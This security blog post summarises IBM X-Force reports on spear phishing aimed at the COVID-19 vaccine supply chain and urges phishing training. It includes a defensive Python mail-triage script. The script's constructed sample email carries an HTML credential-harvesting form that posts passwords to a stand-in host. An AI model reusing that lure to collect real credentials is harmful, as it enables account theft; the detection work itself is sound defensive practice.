Yesterday, IBM Security X-Force warned of more spear phishing attacks against companies involved in the COVID-19 vaccine supply chain. The warning was issued after their team discovered 50 more files tied to attempts to phish employee credentials.
This is the second report IBM Security has released on these COVID-19 cyberattacks. The first report pointed out the presence of a phishing campaign against businesses participating in the vaccine supply chain.
How the latest IBM report on spear phishing can help protect your business
The new report warns that the campaign is far more sophisticated than anticipated. Moreover, the attackers are targeting executives and workers across the board, including key positions such as chief executive officers, global sales officers, directors of finance, system administrators and human-resource officers.
Staff of all businesses should take clear note of these reports, because they show how sophisticated phishing attacks have become and, more importantly, why you need to invest in phishing training in your company.
In this blog, we’ll take a closer look at the IBM report and highlight the points that should concern you.
The report issued on April 14 was the second one released by IBM Security Intelligence. A similar report on COVID-19 themed phishing attacks was issued by Unit 42 of Palo Alto Networks as well; the Unit 42 report shared their study of 70,000 similar emails.
The two IBM reports focus on spear phishing attempts against the COVID-19 vaccine supply chain. As per the reports, the attackers targeted 44 companies in the chain in 14 countries across the globe, including businesses in the transportation, healthcare and technology sectors.
The campaign impersonated an executive from Haier Biomedical, a major biomedical company, and targeted executive positions and roles across the board.
Key takeaways of the IBM report
Here are the key takeaways of the report that should interest you:
- Firstly, the phishing attempts on the vaccine supply chain began well in advance, months before a vaccine was approved for use.
- Secondly, the attackers studied the targeted organizations beforehand. This became clear from the content of the emails.
- Thirdly, the messages displayed a high level of language skill, matching the educational background of the person they spoofed.
- And lastly, the emails used attachments that would open locally and ask the victim for his or her credentials to view the file.
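The last takeaway describes a credential lure carried inside the attachment itself. The check below is an added example, not code from the IBM report: it parses a constructed .eml message with Python's standard `email` library, flags HTML attachments that contain a password form, and compares the mailbox domain against the organisation named in the display name (the `haier-biomedical.example` domain and the sample addresses are placeholders, not real addresses).

```python
"""Mail triage check for HTML attachments that ask for credentials.

Added example with a constructed sample message; the sender and the
organisation domain are placeholders, not real addresses.
"""
import re
from email import policy
from email.parser import BytesParser

# Constructed sample: the display name claims an executive of the impersonated
# company, the mailbox is an unrelated free-mail address, and the attached HTML
# file asks for a login before it "shows" the document.
SAMPLE_EML = b"""\
From: "Jane Doe (Haier Biomedical)" <jane.doe.example@gmail.com>
To: finance@example.com
Subject: Cold chain RFQ - please review
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset=utf-8

Please open the attached quotation and sign in to view it.
--XYZ
Content-Type: text/html; name="quotation.html"
Content-Disposition: attachment; filename="quotation.html"

<html><body><form action="https://collector.invalid/post" method="post">
Email <input type="text" name="u"> Password <input type="password" name="p">
<input type="submit" value="View document"></form></body></html>
--XYZ--
"""

PASSWORD_FIELD = re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action\s*=\s*["\']?([^"\'\s>]+)', re.I)


def find_credential_lures(raw: bytes) -> list[dict]:
    """One finding per HTML attachment carrying a password field."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():          # skips the real message body
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()                # decoded attachment text
        if PASSWORD_FIELD.search(html):
            findings.append({"filename": part.get_filename(),
                             "form_actions": FORM_ACTION.findall(html)})
    return findings


def sender_domain_mismatch(raw: bytes, claimed_org_domain: str) -> bool:
    """True when the From mailbox domain differs from the claimed organisation."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender = msg["from"].addresses[0]            # parsed display name + mailbox
    return sender.domain.lower() != claimed_org_domain.lower()
```

Run over a mailbox export, the two functions give a quarantine queue of messages whose attachment asks for a login or whose sender mailbox does not belong to the organisation it claims to represent.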
Why is spear phishing so dangerous?
Businesses should be worried about the level of sophistication of these attacks. They underline how refined spear phishing attacks have become.
Another example of a high-severity phishing campaign was disclosed by Proofpoint recently. Last month, it published the details of a similar attack that targeted senior medical researchers in the US and Israel.
The attackers used multiple modes of communication to trap their targets. They used text messages, phishing emails, LinkedIn and WhatsApp to build trust and persuade the targets to visit a fake website. The fake website would then be used to harvest the victims' Microsoft credentials.
In our opinion, you need to exercise strict vigilance to ward off such attacks. This is because phishing filters cannot guard you against all phishing attempts. Criminals can bypass them by hijacking domains and using valid Gmail addresses.
Another problem is the amount of personal data that has been leaked. Last week, Business Insider reported a Facebook data leak that happened in 2019. The incident compromised the phone numbers and personal details of 500 million Facebook users. The ongoing Accellion data breach, too, has resulted in the leakage of sensitive information about millions of people across the globe.
Altogether, you should be prepared for malicious emails that look legitimate. In fact, they would appear to have originated from trustworthy sources.
Why is phishing training so important?
Your strongest protection against such emails is employee awareness. For this purpose, you need to put in place a strong phishing training program.
The training should cover all aspects of phishing. This should include how to check email addresses, links and email attachments.
In our opinion, you need to put in place a holistic training program that covers all areas of information security. This is because the spear phishing attacks discussed above are trickier than ordinary phishing emails. Thus, you should cover topics such as good email practices and the secure use of mobile devices as well.
The phishing training should be mandatory for all, including contractors and third-party vendors.
In addition to the training, employees should also go through regular phishing tests. Taking these steps would ensure that your staff remains vigilant towards suspicious emails. Moreover, your IT staff would be able to identify the weaknesses of your security apparatus.